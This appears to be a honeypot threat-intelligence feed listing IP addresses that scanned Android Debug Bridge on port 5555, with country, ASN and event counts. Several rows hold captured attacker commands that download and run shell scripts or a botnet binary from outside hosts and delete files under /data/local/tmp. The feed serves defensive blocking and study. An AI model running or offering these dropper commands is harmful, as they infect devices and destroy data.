| IPv4 | 213.209.143.126 | Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=DE; asn=214943; asn_org=Railnet LLC; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://213.209.143.62/w.sh; sh w.sh; curl http://213.209.143.62/c.sh; sh c.s" | scanning_host | 2025-11-09 | |
| IPv4 | 213.209.143.148 | Attacker IP • ADB / seen in ADBHoney; events=29; ports=5555; cc=DE; asn=214943; asn_org=Railnet LLC; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://213.209.143.62/w.sh; sh w.sh; curl http://213.209.143.62/c.sh; sh c.s" | scanning_host | 2025-11-09 | |
| IPv4 | 216.126.227.248 | Attacker IP • ADB / seen in ADBHoney; events=1; ports=5555; cc=US; asn=14956; asn_org=ROUTERHOSTING; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 218.19.14.194 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 220.94.213.137 | Attacker IP • ADB / seen in ADBHoney; events=71; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" | scanning_host | 2025-11-09 | |
| IPv4 | 221.159.61.114 | Attacker IP • ADB / seen in ADBHoney; events=58; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" | scanning_host | 2025-11-09 | |
| IPv4 | 221.233.24.226 | Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 35.203.210.151 | Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=GB; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 45.134.26.47 | Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=RU; asn=198953; asn_org=Proton66 OOO; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 45.156.128.158 | Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 45.156.129.161 | Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 45.33.68.33 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 45.33.84.124 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 45.55.130.199 | Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 45.56.66.119 | Attacker IP • ADB / seen in ADBHoney; events=301; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 45.95.147.229 | Attacker IP • ADB / seen in ADBHoney; events=612; ports=5555; cc=NL; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 46.27.101.170 | Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=ES; asn=12430; asn_org=Vodafone Spain; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 51.161.172.223 | Attacker IP • ADB / seen in ADBHoney; events=29; ports=5555; cc=AU; asn=16276; asn_org=OVH SAS; cats=Misc activity,Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 54.215.46.194 | Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=16509; asn_org=AMAZON-02; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 58.227.216.183 | Attacker IP • ADB / seen in ADBHoney; events=63; ports=5555; cc=KR; asn=17574; asn_org=Seoul Metropolitan Government Computer Center; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" | scanning_host | 2025-11-09 | |
| IPv4 | 59.27.225.24 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 61.10.160.142 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=HK; asn=9908; asn_org=HK Cable TV Ltd; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 61.3.102.238 | Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=IN; asn=9829; asn_org=National Internet Backbone; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=0 | malware_hosting | 2025-11-09 | |
| IPv4 | 64.227.146.243 | Attacker IP • ADB / seen in ADBHoney; events=64; ports=5555; cc=IN; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.156.108 | Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.156.109 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.156.120 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.156.52 | Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.156.61 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.156.80 | Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.156.84 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.197.152 | Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.197.164 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.197.212 | Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.197.225 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.197.227 | Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.197.239 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Misc activity; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.197.47 | Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode,Detection of a Network Scan; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.197.61 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Misc activity; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.197.77 | Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 64.62.197.86 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 65.49.1.108 | Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 65.49.1.120 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 65.49.1.152 | Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 65.49.1.202 | Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Detection of a Network Scan; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 65.49.1.205 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 65.49.20.117 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Misc activity; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 65.49.20.68 | Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 65.49.20.69 | Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 65.49.20.84 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 65.49.20.92 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 66.132.153.117 | Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 66.132.153.132 | Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 66.175.220.105 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 71.6.134.233 | Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=US; asn=10439; asn_org=CARINET; cats=Misc activity,Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 71.6.233.155 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=10439; asn_org=CARINET; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 74.207.253.22 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 74.89.42.238 | Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=US; asn=6128; asn_org=CABLE-NET-1; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 77.83.240.70 | Attacker IP • ADB / seen in ADBHoney; events=415; ports=5555; cc=US; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 77.90.39.123 | Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=DE; asn=209874; asn_org=Tech Tide Portugal Unipessoal LDA; adb_cmd_hits=0; cmd="cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://77.90.39.122/1.sh; curl -O http://77.90.39.122/1.sh; chmod 777 1.sh; sh 1.sh; tftp 77.90.39.1" | scanning_host | 2025-11-09 | |
| IPv4 | 78.128.114.126 | Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=BG; asn=50360; asn_org=Tamatiya EOOD; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 78.128.114.130 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BG; asn=50360; asn_org=Tamatiya EOOD; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 78.128.114.38 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BG; asn=50360; asn_org=Tamatiya EOOD; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 78.42.82.0 | Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=DE; asn=3209; asn_org=Vodafone GmbH; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 79.124.49.90 | Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=BG; asn=50360; asn_org=Tamatiya EOOD; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 79.124.58.18 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BG; asn=50360; asn_org=Tamatiya EOOD; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 79.240.226.74 | Attacker IP • ADB / seen in ADBHoney; events=63; ports=5555; cc=DE; asn=3320; asn_org=Deutsche Telekom AG; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/log" | scanning_host | 2025-11-09 | |
| IPv4 | 80.82.77.144 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=NL; asn=202425; asn_org=IP Volume inc; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 80.94.95.221 | Attacker IP • ADB / seen in ADBHoney; events=31; ports=5555; cc=RO; asn=204428; asn_org=SS-Net; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 80.94.95.75 | Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=RO; asn=204428; asn_org=SS-Net; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 88.210.63.190 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 89.106.69.44 | Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=DE; asn=49581; asn_org=Tube-Hosting; cats=Generic Protocol Command Decode; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 89.248.163.48 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=NL; asn=202425; asn_org=IP Volume inc; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 91.202.233.67 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=TM; asn=200593; asn_org=Prospero Ooo; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 92.63.197.210 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 93.123.109.121 | Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=BG; asn=48090; asn_org=Techoff Srv Limited; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 94.74.182.167 | Attacker IP • ADB / seen in ADBHoney; events=410; ports=5555; cc=IR; asn=214967; asn_org=Optibounce, LLC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.urbotnetisass; curl http://94.154.35.154/arm.urbotnetisass -O; chmod +x arm.urbotnetisass; ./ar" | scanning_host | 2025-11-09 | |
| IPv4 | 94.74.182.75 | Attacker IP • ADB / seen in ADBHoney; events=170; ports=5555; cc=IR; asn=214967; asn_org=Optibounce, LLC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.urbotnetisass; curl http://94.154.35.154/arm.urbotnetisass -O; chmod +x arm.urbotnetisass; ./ar" | scanning_host | 2025-11-09 | |
| IPv4 | 94.74.191.7 | Attacker IP • ADB / seen in ADBHoney; events=186; ports=5555; cc=IR; asn=214967; asn_org=Optibounce, LLC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.urbotnetisass; curl http://94.154.35.154/arm.urbotnetisass -O; chmod +x arm.urbotnetisass; ./ar" | scanning_host | 2025-11-09 | |
| IPv4 | 204.76.203.230 | Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 65.49.1.212 | Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 65.49.1.217 | Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 88.247.182.131 | Attacker IP • ADB / seen in ADBHoney; events=46; ports=5555; cc=TR; asn=47331; asn_org=Turk Telekom; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp/*" | scanning_host | 2025-11-09 | |
| IPv4 | 104.237.156.209 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 85.11.183.5 | Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=GB; asn=212027; asn_org=PebbleHost Ltd; adb_cmd_hits=0 | scanning_host | 2025-11-09 | |
| IPv4 | 159.196.168.164 | Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=AU; asn=4764; asn_org=Aussie Broadband; adb_cmd_hits=0 | scanning_host | 2025-11-10 | |
| IPv4 | 103.125.189.66 | Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=VN; asn=135905; asn_org=VIETNAM POSTS AND TELECOMMUNICATIONS GROUP; adb_cmd_hits=0 | scanning_host | 2025-11-10 | |
| IPv4 | 216.218.206.66 | Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-10 | |
| IPv4 | 216.218.206.74 | Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0 | scanning_host | 2025-11-10 | |
| IPv4 | 211.184.55.136 | Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 | scanning_host | 2025-11-10 | |
| IPv4 | 198.235.24.207 | Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0 | scanning_host | 2025-11-10 | |
| IPv4 | 162.142.125.196 | Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0 | scanning_host | 2025-11-10 |